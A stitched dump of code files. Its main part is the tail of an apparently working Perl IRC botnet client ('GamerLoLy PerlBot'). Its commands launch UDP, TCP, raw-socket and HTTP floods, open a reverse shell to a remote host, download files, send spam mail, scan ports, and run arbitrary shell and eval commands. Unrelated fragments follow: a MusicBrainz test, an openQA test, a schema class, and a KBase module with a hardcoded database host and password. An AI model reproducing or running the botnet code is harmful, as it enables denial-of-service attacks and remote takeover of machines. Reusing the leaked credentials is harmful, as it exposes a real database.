sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^channel/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Channel Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1join <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1part <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1rejoin <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1op <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1deop <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1voice <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1devoice <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1nick <newnick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1msg <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1quit ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1die ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Utils Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
}
#########################
##### [ Functions ] #####
#########################
if ($funcarg =~ /^die/) {
sendraw($IRC_cur_socket,"QUIT :");
$killd ="kill -9".fork;
system (`$killd`);
}
###########
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket,"JOIN".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket,"PART".$1);
}
###########
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1."9,1started. ");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
}
}
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1","$2");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
}
##############
if ($funcarg =~ /^dns\s+(.*)/){
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
my $hostip="$1";
my $portsc="$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
}
else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
}
}
##############
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta ="$2";
my $dtime ="$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1On Port 12".$porta."9,1for 12".$dtime."9,1seconds. ");
while (($pacota =="1") && ($pacotes =="1")) {
$pacota = 0 if ((time >= $fim) && ($dtime !="0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ;
$porta = int(rand 65000) +1 if ($porta =="0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attack for 12".$1."9,1finished in 12".$dtime."9,1seconds9,1. ");
}
##############
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1with 12".$2."9,1Kb Packets for 12".$3."9,1seconds. ");
my ($dtime, %pacotes) = udpflooder("$1","$2","$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)."9,1Kb in 12".$dtime."9,1seconds to 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta ="$2";
my $dtime ="$3";
my $pacote;
my $pacotese;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1On Port 12".$porta."9,1for 12".$dtime."9,1seconds. ");
while (($pacota =="1") && ($pacotes =="1")) {
$pacota = 0 if ((time >= $fim) && ($dtime !="0"));
$pacote= $rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta =="0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes =="1");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Results 12".$pacotese."9,1Kb in 12".$dtime."9,1seconds to 12".$1."9,1. ");
}
##############
##############
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP Attack] 9,1Attacking 12".$1.":".$2."9,1for 12".$3."9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP Attack] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
##############
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1[HTTP Attack] 9,1Attacking 12".$1."9,1on port 80 for 12".$2."9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket"GET / HTTP/1.1\r\nAccept: */*\r\nHost:".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [HTTP Attack] 9,1Attacking ended on: 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
my $host ="$1";
my $port ="$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell ="/bin/sh -i";
if ($^O eq"MSWin32") {
$shell ="cmd.exe";
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die"socket: $!";
connect(SOCKET, $paddr) or die"connect: $!";
open(STDIN,">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype ="content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL,"| $sendmail -t");
print SENDMAIL"$mailtype\n";
print SENDMAIL"Subject: $subject\n";
print SENDMAIL"From: $sender\n";
print SENDMAIL"To: $recipient\n\n";
print SENDMAIL"@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
##############
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Attacking: 12".$target."");
for (1..10) {
sendraw($IRC_cur_socket,"PRIVMSG".$target.":\001VERSION\001\n");
sendraw($IRC_cur_socket,"PRIVMSG".$target.":\001PING\001\n");
}
}
##############
if ($funcarg =~ /^msgflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target."");
sendraw($IRC_cur_socket,"PRIVMSG".$target.":0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
if ($funcarg =~ /^noticeflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target."");
for (1..2){
sendraw($IRC_cur_socket,"NOTICE".$target.":0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
}
##############
##############
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl","$kem") if $case eq"op";
my $oarg = substr($case, 3);
op("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl","$kem") if $case eq"deop";
my $oarg = substr($case, 5);
deop("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl","$kem") if $case eq"voice";
$oarg = substr($case, 6);
voice("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl","$kem") if $case eq"devoice";
$oarg = substr($case, 8);
devoice("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1","$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2","$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1","$2");
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2","$3");
}
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1","$2");
}
elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
conectar("$2","$1","6667");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval"$1";
}
elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^quit/) {
quit();
}
}
##############
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl","No such file or directory");
return;
} elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket,"PRIVMSG $printl :$linha");
if ($c =="$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
##############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
##############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
##############
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
}
###################
##### [ EOF ] #####
###################
| 47.713519 | 1,131 | 0.454654 |
ed8b72d6b82b7978d01f157cac01b6fe980d417e | 167 | pl | Perl | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | #!/usr/bin/perl -l
use strict;
use warnings FATAL => 'all';
my $cc = "1234 5678 1234 5678";
$cc =~ s/[-\s]//g; # sweet, \s works in character classes
print $cc;
| 13.916667 | 58 | 0.598802 |
ed6375ed661e17d604edb68ba90db28bc835599f | 3,062 | pm | Perl | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | null | null | null | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | null | null | null | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 1 | 2021-02-24T13:14:25.000Z | 2021-02-24T13:14:25.000Z | package t::MusicBrainz::Server::Controller::Release::ReorderCoverArt;
use Test::Routine;
use Test::More;
use MusicBrainz::Server::Test qw( capture_edits );
with 't::Context', 't::Mechanize';
test 'Test reordering cover art' => sub {
my $test = shift;
my $c = $test->c;
my $mech = $test->mech;
MusicBrainz::Server::Test->prepare_test_database($c, <<'EOSQL');
INSERT INTO editor (id, name, password, privs, email, website, bio, email_confirm_date, member_since, last_login_date, ha1) VALUES (1, 'new_editor', '{CLEARTEXT}password', 0, 'test@editor.org', 'http://musicbrainz.org', 'biography', '2005-10-20', '1989-07-23', now(), 'e1dd8fee8ee728b0ddc8027d3a3db478');
INSERT INTO artist (id, gid, name, sort_name)
VALUES (1, '945c079d-374e-4436-9448-da92dedef3cf', 'Artist', 'Artist');
INSERT INTO artist_credit (id, name, artist_count) VALUES (1, 'Artist', 1);
INSERT INTO artist_credit_name (artist_credit, position, artist, name, join_phrase)
VALUES (1, 0, 1, 'Artist', '');
INSERT INTO release_group (id, gid, name, artist_credit)
VALUES (1, '54b9d183-7dab-42ba-94a3-7388a66604b8', 'Release', 1);
INSERT INTO release (id, gid, name, artist_credit, release_group)
VALUES (1, '14b9d183-7dab-42ba-94a3-7388a66604b8', 'Release', 1, 1);
INSERT INTO edit (id, editor, type, status, expire_time) VALUES (1, 1, 316, 2, now());
INSERT INTO edit_data (edit, data) VALUES (1, '{}');
INSERT INTO cover_art_archive.image_type (mime_type, suffix) VALUES ('image/jpeg', 'jpg');
INSERT INTO cover_art_archive.cover_art (id, release, mime_type, edit, ordering)
VALUES (12345, 1, 'image/jpeg', 1, 1), (12346, 1, 'image/jpeg', 1, 2);
EOSQL
$mech->get_ok('/login');
$mech->submit_form( with_fields => { username => 'new_editor', password => 'password' } );
$mech->get_ok('/release/14b9d183-7dab-42ba-94a3-7388a66604b8/reorder-cover-art');
my @edits = capture_edits {
$mech->submit_form(
with_fields => {
'reorder-cover-art.artwork.0.id' => 12345,
'reorder-cover-art.artwork.0.position' => 1,
'reorder-cover-art.artwork.1.id' => 12346,
'reorder-cover-art.artwork.1.position' => 2,
}
);
} $c;
is(@edits, 0, 'does not create edit without changes');
$mech->get_ok('/release/14b9d183-7dab-42ba-94a3-7388a66604b8/reorder-cover-art');
@edits = capture_edits {
$mech->submit_form(
with_fields => {
'reorder-cover-art.artwork.0.id' => 12345,
'reorder-cover-art.artwork.0.position' => 2,
'reorder-cover-art.artwork.1.id' => 12346,
'reorder-cover-art.artwork.1.position' => 1,
}
);
} $c;
is(@edits, 1);
my ($edit) = @edits;
isa_ok($edit, 'MusicBrainz::Server::Edit::Release::ReorderCoverArt');
my $data = $edit->data;
is_deeply(
$data->{new},
[ { id => 12345, position => 2 } ,
{ id => 12346, position => 1 } ],
'Correctly reorders artwork');
};
1;
| 38.275 | 304 | 0.623122 |
ed55caffb72e2ebfbe1befff1d7672daa9d48581 | 819 | pm | Perl | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 84 | 2015-02-10T16:01:52.000Z | 2022-03-10T21:20:14.000Z | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 8,065 | 2015-01-07T07:44:02.000Z | 2022-03-31T12:02:06.000Z | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 404 | 2015-01-14T14:42:44.000Z | 2022-03-30T07:38:08.000Z | # SUSE's openQA tests
#
# Copyright 2021 SUSE LLC
# SPDX-License-Identifier: FSFAP
#
# Summary: Add RT product installation workaround
# Maintainer: QE Kernel <kernel-qa@suse.de>
use base 'opensusebasetest';
use strict;
use warnings;
use testapi;
sub run() {
record_soft_failure 'poo#96158 - Adding RT product to control.xml';
assert_screen 'startshell', 90;
assert_script_run 'sed -i \'/./{H;$!d} ; x ; s/\s*<\/base_product>\s*<\/base_products>/<\/base_product><base_product><display_name>SUSE Linux Enterprise Real Time 15 SP3<\/display_name><name>SLE_RT<\/name><version>15\.3<\/version><register_target>sle-15-\$arch<\/register_target><archs>x86_64<\/archs><\/base_product><\/base_products>/\' control.xml';
assert_script_run 'sed -i \'1d\' control.xml';
script_run 'exit', timeout => 0;
}
1;
| 35.608696 | 355 | 0.710623 |
eda25f4640e79734eff32f1dc570d036e0ec3435 | 560 | pm | Perl | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [
"Artistic-1.0"
] | null | null | null | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [
"Artistic-1.0"
] | null | null | null | t/lib/TestSchema/Result/Genre.pm | gitpan/WebAPI-DBIC | 03099ec39050b37d7079d39188c1475c79111d5c | [
"Artistic-1.0"
] | null | null | null | package TestSchema::Result::Genre;
use warnings;
use strict;
use base qw/DBIx::Class::Core/;
__PACKAGE__->table('genre');
__PACKAGE__->add_columns(
genreid => {
data_type => 'integer',
is_auto_increment => 1,
},
name => {
data_type => 'varchar',
size => 100,
},
);
__PACKAGE__->set_primary_key('genreid');
__PACKAGE__->add_unique_constraint ( genre_name => [qw/name/] );
__PACKAGE__->has_many (cds => 'TestSchema::Result::CD', 'genreid');
__PACKAGE__->has_one (model_cd => 'TestSchema::Result::CD', 'genreid');
1;
| 20.740741 | 71 | 0.644643 |
edb0f65073ac73a9de277e3249cdac60b24cdb0f | 44,275 | pm | Perl | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [
"MIT"
] | null | null | null | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [
"MIT"
] | null | null | null | lib/Bio/KBase/KBaseExpression/GEO2TypedObjects.pm | scanon/expression | 53c7d5e5d9c96562fc42ed85bb1071919ed874d9 | [
"MIT"
] | null | null | null | package Bio::KBase::KBaseExpression::GEO2TypedObjects;
use strict;
use Statistics::Descriptive;
#use Bio::KBase::Exceptions;
# Use Semantic Versioning (2.0.0-rc.1)
# http://semver.org
our $VERSION = "0.1.0";
=head1 NAME
GEO2TypedObjects
=head1 DESCRIPTION
=cut
#BEGIN_HEADER
use DBI;
use Storable qw(dclone);
use Config::Simple;
use Data::Dumper;
use IO::Uncompress::Gunzip qw(gunzip $GunzipError) ;
use IO::File;
use Bio::DB::Taxonomy;
use Bio::KBase;
use Bio::KBase::CDMI::CDMIClient;
use JSON::RPC::Client;
use JSON;
use Bio::KBase::IDServer::Client;
#require Exporter;
our (@ISA,@EXPORT);
@ISA = qw(Exporter);
@EXPORT = qw(new geo2TypedObjects);
#SUBROUTINES
#new
#trim -removes beginning and trailing white space
sub new
{
my($class, @args) = @_;
my $self = {
};
bless $self, $class;
#BEGIN_CONSTRUCTOR
#Copied from M. Sneddon's TreeImpl.pm from trees.git f63b672dc14f4600329424bc6b404b507e9c2503
my($deploy) = @args;
if (! $deploy) {
# if not, then go to the config file defined by the deployment and import
# the deployment settings
my %params;
if (my $e = $ENV{KB_DEPLOYMENT_CONFIG}) {
my $EXPRESSION_SERVICE_NAME = $ENV{KB_SERVICE_NAME};
my $c = Config::Simple->new();
$c->read($e);
my %temp_hash = $c->vars();
my @param_list = qw(dbName dbUser dbhost dbPwd);
for my $p (@param_list)
{
my $v = $c->param("$EXPRESSION_SERVICE_NAME.$p");
if ($v)
{
$params{$p} = $v;
$self->{$p} = $v;
}
}
}
else
{
$self->{dbName} = 'kbase_sapling_v4';
$self->{dbUser} = 'kbase_sapselect';
$self->{dbhost} = 'db4.chicago.kbase.us';
$self->{dbPwd} = 'oiwn22&dmwWEe';
# $self->{dbName} = 'expression';
# $self->{dbUser} = 'expressionselect';
# $self->{dbhost} = 'db1.chicago.kbase.us';
}
#Create a connection to the EXPRESSION (and print a logging debug mssg)
if( 0 < scalar keys(%params) ) {
warn "Connection to Expression Service established with the following non-default parameters:\n";
foreach my $key (sort keys %params) { warn " $key => $params{$key} \n"; }
} else { warn "Connection to Expression established with all default parameters.\n"; }
}
else
{
$self->{dbName} = 'kbase_sapling_v4';
$self->{dbUser} = 'kbase_sapselect';
$self->{dbhost} = 'db4.chicago.kbase.us';
$self->{dbPwd} = 'oiwn22&dmwWEe';
# $self->{dbName} = 'expression';
# $self->{dbUser} = 'expressionselect';
# $self->{dbhost} = 'db1.chicago.kbase.us';
}
#END_CONSTRUCTOR
if ($self->can('_init_instance'))
{
$self->_init_instance();
}
return $self;
}
sub trim($)
{
#removes beginning and trailing white space
my $string = shift;
if (defined($string))
{
$string =~ s/^\s+//;
$string =~ s/\s+$//;
}
return $string;
}
sub geo2TypedObjects
{
#Takes in 2 arguements :
# 1) a file path and name to a GSE Object in JSON format
# 2) data source
